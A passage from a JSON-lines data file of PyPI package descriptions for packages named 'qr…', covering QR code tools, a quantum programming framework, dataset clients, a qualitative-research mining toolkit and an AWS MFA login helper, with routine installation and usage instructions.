HTTP Status Code: 404"} +{"package": "qrgc", "pacakge-description": "QR-code-generatorVery basic library for QR code generator"} +{"package": "qri", "pacakge-description": "qri-python\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\n\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\n\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\n\u2588\u2588\u2551\u2584\u2584 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\n\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\n \u255a\u2550\u2550\u2580\u2580\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255dPython client for qri (\"query\")Installationpip install qriAboutPython wrapper to enable usage ofqri, the dataset toolchain. Can\neither use a locally installed qri command-line program to work with your local repository,\nor can directly get datasets from theQri Cloud.Dataset objects returned by this library have the components that exist in thestandard qri model. The body is returned\nas a Pandas DataFrame in order to easily integrate with other data science systems, like\nJupyter Notebook.UsageThe following examples assume you have the latest release of the qri command-line client\ninstalled. You can get this fromhttps://github.com/qri-io/qri/releasesimport qri# Pull a dataset from cloud and add it to your repository\n$ qri.pull(\"b5/world_bank_population\")Fetching from registry...\"Added b5/world_bank_population: ...\"# List datasets in your repository\n$ qri.list()[Dataset(\"b5/world_bank_population\")]# Get that single dataset as a variable\n$ d = qri.get(\"b5/world_bank_population\")# Look at metadata description\n$ d.meta.description( 1 ) United Nations Population Division. World Population Prospects: 2017 Revision...# Get the dataset body as a pandas DataFrame\n$ d.body. country_name country_code indicator_name ...0 Afghanistan AFG Population, total ......TODO: Save changes"} +{"package": "qrImageIndexer", "pacakge-description": "qrCodeImageSorterProject OutlineThis is a python module which is designed to assist in the easy capture and sorting of photos.\nIt aims to solve a problem I have identified where a large number of photos need to be taken\nin a structured manner. While there are apps which aim to acheive this natively on device,\nthese can sometimes make sharing of the task difficult. They are often also not as fast as\nthe native camera apps, also sometimes missing some of the native post-processing on phones.This tool will allow users to produce a simple list of QR codes that can be used as indices\nin the photos. The photos will then be split into folders based on the content of the QR\ncodes.Operational PhilosophyThe principal of this tool is to generate QR codes which can be printed and included in the photo\nset being captured. Images with QR codes included will be detected and used as index photos. Any\nphotos found after (and including) the index photo, up to the next index photo, will be sorted\ninto a directory as indicated by the QR code. Photos will be processed in file name order as\nthis is consistent with the capture method of all phones and cameras I have personally used.All sorting is done through copying. The original files are left in-place and unmodified.QR codes may appear in the images in any order. 
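The sorting rule just described (walk the photos in file name order, let each QR-bearing photo switch the destination folder, copy rather than move) can be sketched in a few lines of Python. This is only an illustration of the rule, not the package's own implementation; it assumes Pillow and pyzbar are available, and it omits error handling for unreadable or non-image files.

```python
import shutil
from pathlib import Path

from PIL import Image                # assumed dependency for this sketch
from pyzbar.pyzbar import decode     # assumed dependency for this sketch


def sort_photos(input_dir, output_dir):
    # Photos seen before the first QR code land in an 'unsorted' folder.
    target = Path(output_dir) / 'unsorted'
    for photo in sorted(Path(input_dir).iterdir()):  # file name order
        codes = decode(Image.open(photo))
        if codes:
            # Index photo: the QR content names the destination from here on,
            # and the index photo itself is copied there too.
            target = Path(output_dir) / codes[0].data.decode('utf-8')
        target.mkdir(parents=True, exist_ok=True)
        shutil.copy2(photo, target / photo.name)     # copy, never move
```

The actual tool also handles non-image files and an optional prefix on the QR content, as described further below.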
As the directory is determined by the QR code,\nit will be sorted accordingly. The same code may also appear multiple times and will simply add\nthe additional content to the resulting directory.Sorting ExceptionsNon-ImagesAs the tool is targetting images, any files which are not images will be copied into the\ndirectorynon_image_files/under the target output directory.Files Before Index ImageIf there are images which appear before the first QR-containing image will be copied into\nthe directoryunsorted/.Example Input ImagesInstallationThe package is available on PyPi and can be installed with the following command:pip install qrImageIndexerIf you are not using Windows you will also need to install the zBar binaries (these are included\nin the wheel for Windows users):https://pypi.org/project/pyzbar/InstructionsTool Command Line ArgumentsTo use the tool run the command:python -m qrImageIndexerCommand line useage is as per below:usage: qrImageIndexer [-h] [-g INPUT_TEXT_FILE OUTPUT_PDF | -s INPUT_DIR OUTPUT_DIR] [--pdf-type SORT_TYPE] [-q] [-r] [-p STRING_PREFIX] [-v]\n\noptions:\n -h, --help show this help message and exit\n -g INPUT_TEXT_FILE OUTPUT_PDF, --generate-pdf INPUT_TEXT_FILE OUTPUT_PDF\n Generate a PDF of QR codes from a given text file. Specify\n -s INPUT_DIR OUTPUT_DIR, --sort-photos INPUT_DIR OUTPUT_DIR\n Sort photos based on QR codes found in photos. Once a QR code is found all photos will be sorted into the directory indicated by the code until subsequent codes found\n --pdf-type SORT_TYPE Type of PDF to generate. Either linearly sorted or sorted to enable easy slicing of the printed pages. Accepts \"linear\" or \"sliceable\". Linear will sort down page, sliceable will sort \"through\" the page.\n -q, --qr-for-headings\n Generate a QR code for each heading, not just a code for the last items in a tree.\n -r, --repeat-table-headings\n Repeat table headings on every line\n -p STRING_PREFIX, --string-prefix STRING_PREFIX\n Specify a prefix for use in the generated QR codes to differentiate from codes that might also end up in photos\n -v, --verbose Turn progress text to terminal on or offGeneral usageIn general usage the user will generate QR codes from a text file. These QR codes will then be used as index cards while taking photos. Any photos\nwhich appear subsequent to a QR code but before the next QR code will be sorted into a folder. Any photos which appear before a QR code will be sorted\ninto a specific folder of their own.PDF FormatFor ease of use it is recommended to use the--pdf-type sliceableoption, which will allow, when printed single-sided, for the QR codes to be easily sliced\nand stacked for use in-order.File FormatExpected input file format is as a tab indented list. Each level of indentation is considered a child tested below the preceeding level. When photos are sorted\nthese nested elements will form the file paths.Additional file formats could easily be added\nand may be a good first issue for anyone who wishes to contribute.An example input file is shown below:Line 1\n Line 1 1st indent item 1\n Line 1 2nd indent\n Line 1 1st indent item 2\nLine 2\nLine 3\nLine 4\nLine 5\nLine 6In this case photos underLine 1 1st indent item 1would appear in the directoryLine 1/Line 1 1st indent item 1/and photos underLine 1 2nd indentwill appear in the directoryLine 1/Line 1 1st indent item 1/Line 1 2nd indent/.Generally it is recommended that folder structure be used to sort and plan photo capture logically. E.g. 
level 1 of the\nstructure may be particular rooms, level 2 may be objects in the room and level 3 may be specifics about the object.There is no limit on the number of levels that may be included in the document, but higher numbers will result in messier/busier output PDFs.Other Recommended OptionsOther options such as-rwhich will result in the headings from further up the tree being repeaded in the output PDF and-qwhich will generate QR codes for headings as well as the tails of the tree may both also be useful.If it is expected that other QR codes may be present, a prefix can also be added to the QR code package. This can be done with the-poption.Using the option-vfor any operations will provide verbose status output to the command line.Generating PDF DocumentAssuming that the above demo file is saved asdemo.txtthe following command would generate a PDF with repeated headings and qr codes for each line in a sliceable format, with the prefix{image}:python -m qrImageIndexer -g demo.txt demo.pdf -r -q --pdf-type sliceable -p \"{image}\"Sorting ImagesAfter taking photos, these images could then be sorted into a folder calledoutputs\\from a folder calledinputs\\as shown below:python -m qrImageIndexer -s inputs\\ outputs\\ -p \"{image}\"Future FeaturesCurrently the module is command line only. In future this will be expanded to include a GUI\nwhich will simplify the generation of QR codes and the scanning of images for users."} +{"package": "qrImageIndexerGUI", "pacakge-description": "qrCodeImageSorterGUIGUI interface for theqrCodeImageSorterrepository. For detailed information on the philosophy\nof the tool see the readme in this repository. This is a GUI interface for this underlying toolset.A Quick (but rough) Video Guidehttps://user-images.githubusercontent.com/65805625/192924326-2560853a-2418-4b95-8806-40d787ae489c.mp4InstallationTo install the tool, run the below command with any version of Python above 3.7:pip install qrImageIndexerGUIInstructionsLaunch WindowTo load the launch window, run the command:python -m qrImageIndexerGUIThis will present the user with the following window:From here you can open either the window for generating the QR codes or for sorting the resultant images.Generate QR CodesThis window allows the user to generate QR codes. It also provides a preview of what the output PDF will look like:The available controls are listed below:Save PDF generated based on the listed inputs to file;Update sample PDF based on the listed inputs;Toggle sorting of PDF for slicing or down the page;Toggle generating QR codes for heading lines;Toggle reapeating of parent headings on every line of the PDF;Toggle inclusion of a prefix in the QR code;Configure prefix to include;Tab-delineated item input;Sample PDF display.The recommended settings are set by default. In most situations the user should just enter their own text in the\ntext entry field (8).Sort ImagesThis window allows the user to sort photos that have been taken with QR codes in them. The interface will look similar to the below.\nNote that the provided screenshot is shown after having scanned a folder of images for demonstration. It will be blank prior to this:The available controls are listed below:Scan images from a selected directory. This will open a prompt asking the user to select a directory;Save sorted images in a directory. 
This will save the images in the folder structure dictaged by the detected QR codes;Progress bar to indicate image scanning progress;Indicate whether QR codes have a prefix attached;Specify QR code prefix if used;Display images where QR codes are detected;6.1. Path to specified image;6.2. Thumbnail of image;6.3. Path detected in QR code.Not Shown: New Feature - Quick SortThere is now a quick sort button. This button will combine the scanning and saving process. You will be\nprompted for 2 directories, first the input and then the output. Images will be scanned then when\nscanning is complete they will be saved directly to the output directory without displaying the images\nin the window.This will improve performance where large numbers of images loading into the viewing window was\nreducing the processing speed.Note on future featureIt is intended that a feature will be added to allow users to manually add images as key images where they are not detected with a QR code.\nThis will allow users to images where the QR code may not have been detected or where it was forgotten. That is the primary purpose of the\nintermediate preview window but this feature is not implemented yet."} +{"package": "qrimg", "pacakge-description": "qrimgGenerate QRCode ImageInstallpipinstallqrimgUsageHelp InformationC:\\Workspace\\qrimg>qrimg--help\nUsage:qrimg.py[OPTIONS]MESSAGE\n\nOptions:-o,--outputTEXTOutputfilename.[required]-v,--versionINTEGERAnintegerfrom1to40thatcontrolsthesizeoftheQRCode.Thesmallest,version1,isa21x21matrix.DefaulttoNone,meansmakingthecodetodeterminethesizeautomatically.-c,--error-correction[7|15|25|30]controlstheerrorcorrectionusedfortheQRCode.Defaultto30.-s,--box-sizeINTEGERcontrolshowmanypixelseach'box'oftheQRcodeis.Defaultto10.-b,--borderINTEGERcontrolshowmanyboxesthickthebordershouldbe(thedefaultis4,whichistheminimumaccordingtothespecs).-f,--fill-colorTEXTNamedcoloror#RGB color accepted. Defaulttonamedcolor'black'.-b,--back-colorTEXTNamedcoloror#RGB color accepted. 
Defaulttonamedcolor'white'.--helpShowthismessageandexit.Example 1Use qrimg command generate an image contain information \"Hello world\".qrimg-ohello.png\"Hello world\"Example 2Use qrimg command generate an image contain a url.qrimg-osite.pnghttp://www.example.comExample 3Use qrimg command generate a blue colored image.qrimg-osite.png-fbluehttp://www.example.comExample 3Use RGB color.qrimg-osite.png-f#ff00cc http://www.example.comBug reportPlease report any issues athttps://github.com/zencore-cn/zencore-issues.Releasesv0.2.0 2020/06/29Add controller parameters in generating.v0.1.0 2019/05/25First release."} +{"package": "qri-py", "pacakge-description": "No description available on PyPI."} +{"package": "qrisk", "pacakge-description": "qrisk is a Python library with performance and risk\nstatistics commonly used in quantitative finance byQuantopian Inc."} +{"package": "qrisp", "pacakge-description": "Qrisp is an open-source python framework for high-level programming of Quantum computers.\nBy automating many steps one usually encounters when progrmaming a quantum computer, introducing quantum types, and many more features Qrisp makes quantum programming more user-friendly yet stays performant when it comes to compiling programs to the circuit level.DocumentationThe full documentation, alongside with many tutorials and examples, is available underQrisp Documentation.InstallingThe easiest way to install Qrisp is viapippipinstallqrispQrisp has been confirmed to work with Python version 3.8, 3.9 & 3.10.First Quantum Program with QrispThe very first program you usually write, when learning a new programming language, is printing 'hello world'.\nWe want to do the same, but in a quantum way.For this we can make use of theQuantumStringtype implemented in Qrisp. So we start by creating a new variable of the type QuantumString and assign the value 'hello world':fromqrispimportQuantumStringq_str=QuantumString()q_str[:]=\"hello world\"print(q_str)With theprint(q_str)command, we automatically simulate the circuit generated when assigninghello worldtoq_str. And es expected we gethello worldwith a probility of 1 as output:{'hello world':1.0}Now, let's make things more interesting: What happens, if we apply a Hadamard gate to the first qubit of the 7th character in our string?fromqrispimporth,QuantumStringq_str=QuantumString()q_str[:]=\"hello world\"h(q_str[6][0])print(q_str)Go on, install Qrisp and try it yourself!Of course, Qrisp offers much more than just handling strings with a quantum computer. 
More examples, like how to solve a quadratic equation with Grover's algorithm or how to solve the Travelling Salesman Problem on a quantum computer, can be foundhere.Authors and CitationQrisp was mainly devised and implemented by Raphael Seidel, supported by Sebastian Bock and Nikolay Tcholtchev.If you have comments, questions or love letters, feel free to reach out to us:raphael.seidel@fokus.fraunhofer.desebastian.bock@fokus.fraunhofer.denikolay.tcholtchev@fokus.fraunhofer.deLicenseEclipse Public License 2.0"} +{"package": "qritwikaeropy", "pacakge-description": "No description available on PyPI."} +{"package": "qrkey", "pacakge-description": "QrkeySummaryQrkey is a library implementing a protocol designed to facilitate the\ndeployment of robots swarm.\nThe protocol relies onMQTTso that a\nQrkey server is reachable even with a private IP address.\nAccess to the swarm is managed by a QR code based authentication scheme.InstallationPython server library:pip install qrkeyNode client library:npm i qrkeyLicenseqrkeyis distributed under the terms of theBSD-3-Clauselicense."} +{"package": "qrkit", "pacakge-description": "Simple binding of qrencode library released under the public domain\nextracted from qurl.RequirementsTo build the binding you will need to install:libqrencode-devCythonTo use it you will need either:Python Imaging LibraryPillowInstallationDo one of this command to install it from pypipip install qrkitor:easy_install qrkitFrom code:$ python setup.py installSimple usagefrom qrkit.qrimg import encode_to_img\n\nimg = encode_to_img('http://www.python.org/', width=300, border=10)\nimg.save('qrimage.png', 'PNG', quality=80)"} +{"package": "qrl", "pacakge-description": "README.pypi"} +{"package": "qrlew-datasets", "pacakge-description": "datasetsThis helps with the use of standard SQL datasets.It comes with 4 datasets:'extract': an extract from 2 simple datasets 'census' (from the US cenus) and 'beacon' (with japanese names and labels).'financial': fromhttps://relational.fit.cvut.cz/dataset/Financial'imdb': fromhttps://relational.fit.cvut.cz/dataset/IMDb'hematitis': fromhttps://relational.fit.cvut.cz/dataset/HepatitisInstalationThe package can be installed with:pipinstallqrlew-datasetsThe library assumes:either that postgresql is installed,or that docker is installed and can spawn postgresql containers.Postgresql in a containerThe library automatically spawns containers. 
There is nothing to do.Without docker installedSetup apsqlas inhttps://colab.research.google.com/github/tensorflow/io/blob/master/docs/tutorials/postgresql.ipynbYou can set the port to use: here 5433.# Inspred by https://colab.research.google.com/github/tensorflow/io/blob/master/docs/tutorials/postgresql.ipynb#scrollTo=YUj0878jPyz7sudoapt-get-y-qqupdate\nsudoapt-get-y-qqinstallpostgresql-14# Start postgresql server# sudo sed -i \"s/#port = 5432/port = 5433/g\" /etc/postgresql/14/main/postgresql.confsudosed-i\"s/port = 5432/port = 5433/g\"/etc/postgresql/14/main/postgresql.conf\nsudoservicepostgresqlstart# Set passwordsudo-upostgrespsql-Upostgres-c\"ALTER USER postgres PASSWORD 'pyqrlew-db'\"# Install python packagesTesting the absence of docker if docker is installed:You can simulate the absence of docker by running this code inside a container.First run:docker run --name test -d -i -t -v .:/datasets ubuntu:22.04Then run:docker exec -it test bashBuilding the.sqldumpsTo build the datasets, install the requirements with:poetryshellYou can then build the datasets with:python-mdatasets.buildYou may need to install the requirements of some drivers such as:https://pypi.org/project/mysqlclient/"} +{"package": "qrl-graph", "pacakge-description": "QRL_graphReinforcement Learning for the quantum speedup in the graphGiven a graph, we try to compute the classical and quantum critical time. The definition of the criticial time is defined as the hitting time of the endpoints with the probility bigger than $p_0$.Installpip install qrl_graph==0.0.13Usageimportnumpyasnpfromscipy.sparse.csgraphimportlaplacianimportnetworkxasnximportmatplotlib.pyplotaspltimportmatplotlibfromqrl_graph.graph_env.graphimportGraphg=np.array([[0,1,1,0],[1,0,0,1],[1,0,0,1],[0,1,1,0]])g_env=Graph(g=g)print('Laplacian matrix:\\n',g_env.laplacian)t_cl=g_env.get_classical_time(p0=0.1)t_q=g_env.get_quantum_time(p0=0.1)print('Classical time:',t_cl)print('Quantum time:',t_q)print('Speed up:',t_cl/t_q)# uncomment to show the graph# g_env.show_graph()The results areLaplacian matrix:\n [[ 2 -1 -1 0]\n [-1 2 0 -1]\n [-1 0 2 -1]\n [ 0 -1 -1 2]]\nClassical time: 0.25000000000000006\nQuantum time: 0.6000000000000003\nSpeed up: 0.4166666666666665Linear chainfromqrl_graph.graph_env.graphimportGraphfromqrl_graph.utilsimportconstruct_linear_graphN=40g=construct_linear_graph(N)g_env=Graph(g=g)# print('Laplacian matrix:\\n', g_env.laplacian)p0=1.0/(2*N)t_cl=g_env.get_classical_time(p0=p0)t_q=g_env.get_quantum_time(p0=p0)print('Linear chain, N =',N)print('Classical time:',t_cl)print('Quantum time:',t_q)print('Speed up:',t_cl/t_q)glued treefromqrl_graph.graph_env.graphimportGraphfromqrl_graph.utilsimportconstruct_glued_tree_graph# this is the height of binary tree, and total height of the glued tree is 2*heighth=3g=construct_glued_tree_graph(h)N=g.shape[0]g_env=Graph(g=g)# print('Laplacian matrix:\\n', g_env.laplacian)p0=1.0/(2*N)t_cl=g_env.get_classical_time(p0=p0)t_q=g_env.get_quantum_time(p0=p0)print('Glued tree, N =',N)print('Classical time:',t_cl)print('Quantum time:',t_q)print('Speed up:',t_cl/t_q)"} +{"package": "qrllearner", "pacakge-description": "No description available on PyPI."} +{"package": "qrlocator", "pacakge-description": "QRlocatorOverviewThis package allows a user to get the 3D postion of QR codes from an image. It uses the OpenCV and Pyzbar libraries to scan and decode the QR codes, but you can also use other QR code scanning libraries and add information to the class usingadd_qr_code. 
This class mainly provides theX,Y, andZcoordinates of the center point of a code, whereYis a horizontal axis parallel to the camera's direction,Xis a horizontal axis perpendicular to the camera's direction, andZis a vertical axis representing the codes height.add picturesHomepagehttps://test.pypi.org/project/qrlocator/Installpip install -i https://test.pypi.org/simple/ qrlocator \nfrom qrlocator.QRlocator import QRlocatorQuick StartThe creation of the QRlocator class requires 4 parameters. It is very likely that you don't know some of these values, or the values you have are incorrect. This tool can automatically find the 3 best fit values for your camera:image_path(str): The file path of the image you wish to scan.focal_ratio(float): This is the focal length in mm over the sensor width in mm (focal/sensor) of the camera that was used to take the current image.x_focal_angle_scalar(float): A scalar value to correct the x-angle calculated from the image.z_focal_angle_scalar(float): A scalar value to correct the z-angle calculated from the image.qr_locator=QRlocator(r'path_to_image',focal_ratio,x_focal_angle_scalar,z_focal_angle_scalar)qr_locator.scan_image()qr_locator.show_visualization(qr_code_side_length_mm)Functionsqr_locator.scan_image()Scans and saves the QR codes from the current imageqr_locator.modify_image(image)qr_locator.modify_image_path(r'image_path')Used to modify the locator's current imageqr_locator.get_y_position(data,qr_code_side_length_mm)Calculates and returns the Y coordinate (horizontal axis parallel to the camera's direction) of the QR code in inches.data(str): The string of data present in your QR codeqr_code_side_length_mm(float): The actual side length of the QR code in millimetersqr_locator.get_x_position(data,qr_code_side_length_mm)Calculates and returns the X coordinate (horizontal axis perpendicular to the camera's direction) of the QR code in inches.data(str): The string of data present in your QR codeqr_code_side_length_mm(float): The actual side length of the QR code in millimetersqr_locator.get_z_position(data,qr_code_side_length_mm)Calculates and returns the Z coordinate (vertical axis representing the code\u2019s height) of the QR code in inches.data(str): The string of data present in your QR codeqr_code_side_length_mm(float): The actual side length of the QR code in millimetersqr_locator.show_visualization(qr_code_side_length_mm,qr_codes=None)Generates and displays a 2D visualization of the located QR codes in XY and XZ planes.qr_code_side_length_mm(float): The actual side length of the QR code in millimetersqr_codes(dict, optional): A dictionary containing QR codes. 
If not provided, the method will use the QR codes stored in the object.qr_locator.add_qr_code(data,tl,tr,br,bl)Adds a QR code to the classtl(float): The pixel location pair (x,y) of the top left corner of the QR codetr(float): The pixel location pair (x,y) of the top right corner of the QR codebr(float): The pixel location pair (x,y) of the botom right corner of the QR codebl(float): The pixel location pair (x,y) of the bottom left corner of the QR codeqr_locator.get_qr_codes()qr_locator.get_qr_code(data)Returns the dictionary of the locator's code(s)data(str): The string of data present in your QR codeqr_locator.get_max_side_length(data)Calculates and returns the maximum side length of the QR code in pixels.data(str): The string of data present in your QR code"} +{"package": "qrm", "pacakge-description": "QrM - Qt5 based file explorer for reMarkableUse a Qt5 based UI tomanageview, upload, delete content of/to your\nreMarkable I/II via SSH.Project pageUsageOnce configured runqrmto start up a UI, connect to and see a list of content on a (WiFi enabled\nand switched on) reMarkable device. Drag and drop EPUB and PDF files onto the window to make them\navailable on the device.Runqrm [ls|list]to list content on the connected deviceRunqrm [upload|push] []to copy stuff onto the connected deviceRunqrm infoto see configuration and stuffRunqrm rebootto .. you know..Runqrm config-auth = ...to configure stuff, e.g.Please note that currently reMarkable will not recognize file modifications done via SSH - to make\nnew files available you'll have to reboot the device. Runqrm rebootor press theRebootbutton\nto do this via SSH (or reboot it manually).ConfigurationIn the UI just enter your credentials, they're getting saved automatically.The command line interface allows persistant configuration using theconfig-authsub-command:qrm config-auth host=192.168.178.13 password='s0rry_Pl4in+ex+!'Please note that currently only connection via IP address (rather than hostname) and plaintext\npassword is working. This is subject to change (\"of course\").ToDo for v1.0Allow hostnames instead of IP addressesMake use of shared keys and configuration in~/.ssh/configSupport drag&drop to add content in UISupport deletionSupport PdfSupport web pages via PdfFuture featuresDownload and manage notesMake backupsOther convenience stuff via SSH, e.g. installing softwareInstallationpip3 install [--user] [--upgrade] qrmDevelopment & Contribution# provide dependencies, consider also using pyenv\npip3 install -U poetry pre-commit\n\ngit clone --recurse-submodules https://projects.om-office.de/frans/qrm.git\n\ncd qrm\n\n# activate a pre-commit gate keeper\npre-commit install\n\n# if you need a specific version of Python inside your dev environment\npoetry env use ~/.pyenv/versions/3.10.4/bin/python3\n\npoetry installLicenseFor all code contained in this repository the rules of GPLv3 apply unless\notherwise noted. That means that you can do what you want with the source\ncode as long as you make the files with their original copyright notice\nand all modifications available.SeeGNU / GPLv3for details.Read(nothing here yet)"} +{"package": "qrm545-xd", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qrmagic", "pacakge-description": "QR MagicSome magical semi-automated tools to better handle sample tracking during fieldwork.To install:python3 -m pip install qrmagicOr, to get the development version:python3 -m pip install -e git+https://github.com/kdm9/NVTK.gitQR Code Label PrintingMake a PDF of labels for each sample ID. There are a few hard-coded \"Avery\" label\ntypes commonly used in the Weigel group, and it's super easy to add others\n(please create a github issue if you need help doing so, or want me to build a\nnew label type into the code).$python3-mqrmagic.labelmaker--help\nusage:labelmaker.py[-h][--demoDIR][--list-label-types][--label-typeTYPE][--copiesN][--outputFILE][--id-fileFILE][--id-formatFORMAT][--id-startN][--id-endN]optionalarguments:-h,--helpshowthishelpmessageandexit--demoDIRWriteademo(10labels,fourrepsperlabel)foreachlabeltypetoDIR.--list-label-typesWritealistoflabeltypes.--label-typeTYPELabeltype.--copiesNCreateNcopiesofeachlabel.--outputFILEOutputPDFfile.--id-fileFILEFileofIDs,oneperline.--id-formatFORMATPython-styleformatstringgoverningIDformate.g.WGL{:04d}givesWGL0001..WGL9999--id-startNFirstIDnumber(default1)--id-endNLastIDnumber(default100)To see what label types are available, do:$ python3 -m qrmagic.labelmaker --list-label-types\nL7636: Mid-sized rounded rectangular labels (45x22mm) in sheets of 4x12\nL3667: Mid-sized rectangular labels (48x17mm) in sheets of 4x16\nL7658: Small labels (25x10mm) in sheets of 7x27\nCryoLabel: Cryo Labels for screw-cap eppies. White on left half, clear on right.One can also create a demonstration PDF for each label type with the command:$python3-mqrmagic.labelmaker--demooutput_dir/QR Code-based Image organisationSo, we took all these photos in the field, now what do we do with them? The first step is to organise them by sample. To do so manually is cumbersome, so here are some tools to help.Step 1: scan images on your machineThis CLI tool will scan your images, doing its best to decode all the QRcodes\nthey contain. For each image it also reports the location and time the image\nwas taken, and various other bits of metadata.NB: for silly javascript reasons, you need to have all images be in a single\ndirectory. If you have your images organised in directories (e.g. by date, or\nby camera), please run this process once per directory, or move or symlink all\nimages into a single directory.qrmagic-detect -o my-images.json my-images/*.JPGStep 2: curationNow, go tohttps://qrmagic.kdmurray.id.au/imagesort.html. Here, you should\nupload the JSON file created above, and up will pop a table of images. You can\nthen try automatically filling missing barcodes based on the adjacent codes\n(always do a bit of manual curation here), or manually type in QR codes that\nare not detectable. 
When you are finished, you can download a Bash script which\ncontains commands to rename all your files by sample ID (or whatever your\nbarcodes denote).Step 3: rename imagesOnce downloaded, the renamer script should be run in the same directory your\nimages are all in:cd /path/to/my-images\nbash -x ~/Downloads/rename.sh"} +{"package": "qrmaker", "pacakge-description": "# qr-poster-maker\n\u4e8c\u7ef4\u7801\u6d77\u62a5\u751f\u6210\u5668"} +{"package": "qrm-client", "pacakge-description": "No description available on PyPI."} +{"package": "qrmfinal-xd", "pacakge-description": "No description available on PyPI."} +{"package": "qrmine", "pacakge-description": ":flashlight: QRMine/\u02c8k\u00e4rm\u012bn/QRMine is a suite of qualitative research (QR) data mining tools in Python using Natural Language Processing (NLP) and Machine Learning (ML). QRMine is work in progress.Read More..What it doesNLPLists common categories for open coding.Create a coding dictionary with categories, properties and dimensions.Topic modelling.Arrange docs according to topics.Compare two documents/interviews.Select documents/interviews by sentiment, category or title for further analysis.Sentiment analysisMLAccuracy of a neural network model trained using the dataConfusion matrix from an support vector machine classifierK nearest neighbours of a given recordK-Means clusteringPrincipal Component Analysis (PCA)Association rulesHow to installpip install qrmine\npython -m spacy download en_core_web_smMac usersMac users, please installlibompfor XGBoostbrew install libompHow to Useinput files are transcripts as txt files and a single csv file with numeric data. The output txt file can be specified.The coding dictionary, topics and topic assignments can be created from the entire corpus (all documents) using the respective command line options.Categories (concepts), summary and sentiment can be viewed for entire corpus or specific titles (documents) specified using the --titles switch. Sentence level sentiment output is possible with the --sentence flag.You can filter documents based on sentiment, titles or categories and do further analysis, using --filters or -fMany of the ML functions like neural network takes a second argument (-n) . In nnet -n signifies the number of epochs, number of clusters in kmeans, number of factors in pca, and number of neighbours in KNN. KNN also takes the --rec or -r argument to specify the record.Variables from csv can be selected using --titles (defaults to all). 
The first variable will be ignored (index) and the last will be the DV (dependant variable).Command-line optionsqrmine --helpCommandAlternateDescription--inp-iInput file in the text format with Topic--out-oOutput file name--csvcsv file name--num-nN (clusters/epochs etc depending on context)--rec-rRecord (based on context)--titles-tDocument(s) title(s) to analyze/compare--codedictGenerate coding dictionary--topicsGenerate topic model--assignAssign documents to topics--catList categories of entire corpus or individual docs--summaryGenerate summary for entire corpus or individual docs--sentimentGenerate sentiment score for entire corpus or individual docs--nlpGenerate all NLP reports--sentenceGenerate sentence level scores when applicable--nnetDisplay accuracy of a neural network model -n epochs(3)--svmDisplay confusion matrix from an svm classifier--knnDisplay nearest neighbours -n neighbours (3)--kmeansDisplay KMeans clusters -n clusters (3)--cartDisplay Association Rules--pcaDisplay PCA -n factors (3)Use it in your codefromqrmineimportContentfromqrmineimportNetworkfromqrmineimportQrminefromqrmineimportReadDatafromqrmineimportSentimentfromqrmineimportMLQRMineMore instructions and a jupyter notebook availablehere.Input file formatNLPIndividual documents or interview transcripts in a single text file separated by Topic. Example belowTranscript of the first interview with John.\nAny number of lines\nFirst_Interview_John\n\nText of the second interview with Jane.\nMore text.\nSecond_Interview_Jane\n\n....Multiple files are suported, each having only one break tag at the bottom with the topic.\n(The tag may be renamed in the future)MLA single csv file with the following generic structure.Column 1 with identifier. If it is related to a text document as above, include the title.Last column has the dependent variable (DV). (NLP algorithms like the topic asignments may provide the DV)All independent variables (numerical) in between.index, obesity, bmi, exercise, income, bp, fbs, has_diabetes\n1, 0, 29, 1, 12, 120, 89, 1\n2, 1, 32, 0, 9, 140, 92, 0\n......AuthorBell Eapen(McMaster U) |Contact|This software is developed and tested usingCompute Canadaresources.See also::fire: The FHIRForm framework for managing healthcare eFormsSee also::eyes: Drishti | An mHealth sense-plan-act framework!CitationPlease cite QRMine in your publications if it helped your research. Here\nis an example BibTeX entry(Read paper on arXiv):@article{eapenbr2019qrmine,\n title={QRMine: A python package for triangulation in Grounded Theory},\n author={Eapen, Bell Raj and Archer, Norm and Sartpi, Kamran},\n journal={arXiv preprint arXiv:2003.13519 },\n year={2020}\n}QRMine is inspired bythis workand the associatedpaper.Give us a star \u2b50\ufe0fIf you find this project useful, give us a star. It helps others discover the project.Demo"} +{"package": "qr_monkey", "pacakge-description": "qr_monkeyAn API Client for qrcode-monkey API that integrates custom and unique looking QR codes into your system or workflow.Installation$pipinstallqr_monkeyUsage1. Import qr_monkeyAfter installing the package, import it into your project.import qr_monkey2. Create base_urlUse the provided custom function to create a custom QR code with the specified parameters:base_url = \"specify the url you want to link to the QR code\"3. Set parametersYou can set these according to the'QRCode-Monkey website'For example:params = {\n\"data\": base_url,\n\"config\": {\n\"body\": \"circle\",\n},\n\"size\": 300,\n\"download\": False,\n\"file\": \"png\"\n}4. 
Create custom QR codeqr_monkey.custom(base_url,params)ContributingInterested in contributing? Check out the contributing guidelines. Please note that this project is released with a Code of Conduct. By contributing to this project, you agree to abide by its terms.Licenseqr_monkeywas created by Vansh Murad Kalia. It is licensed under the terms of the MIT license.Creditsqr_monkeywas created withcookiecutterand thepy-pkgs-cookiecuttertemplate."} +{"package": "qrmr", "pacakge-description": "Work secure using MFA according to best practices, and efficiently\nwith AWS terminal tools likeawscli,aws-shell,terraform, etc.Highly opinionated Amazon Web Services (AWS) terminal login toolkit, focused on\nenforcing and simplifying AWS Multi-Factor Authentication (MFA).Written in Python 3, backwards compatible with Python 2, thanks tofutures!Currently being heavily tested in production against AWS multi-account setup (Well-Architected Framework) on macOS High Sierra.Feels most at home usingvirtualenv, of course.How it works:Stores your AWS IAM credential profile in~/.qrmr/credentials.ini;Prompts for MFA OTP code;Uses AWS STS to retrieve and store fresh SessionToken and temporary Access Key ID and Secret Access Key using your credential profile.Near future:Manage~/.aws/credentialsand~/.aws/configfilesUnit Tests :)Because you probably just want to start using it:Installation of QRMR:pip install qrmrSetup of AWS Credentials:qrmr setupRefreshing your SessionToken and temporary 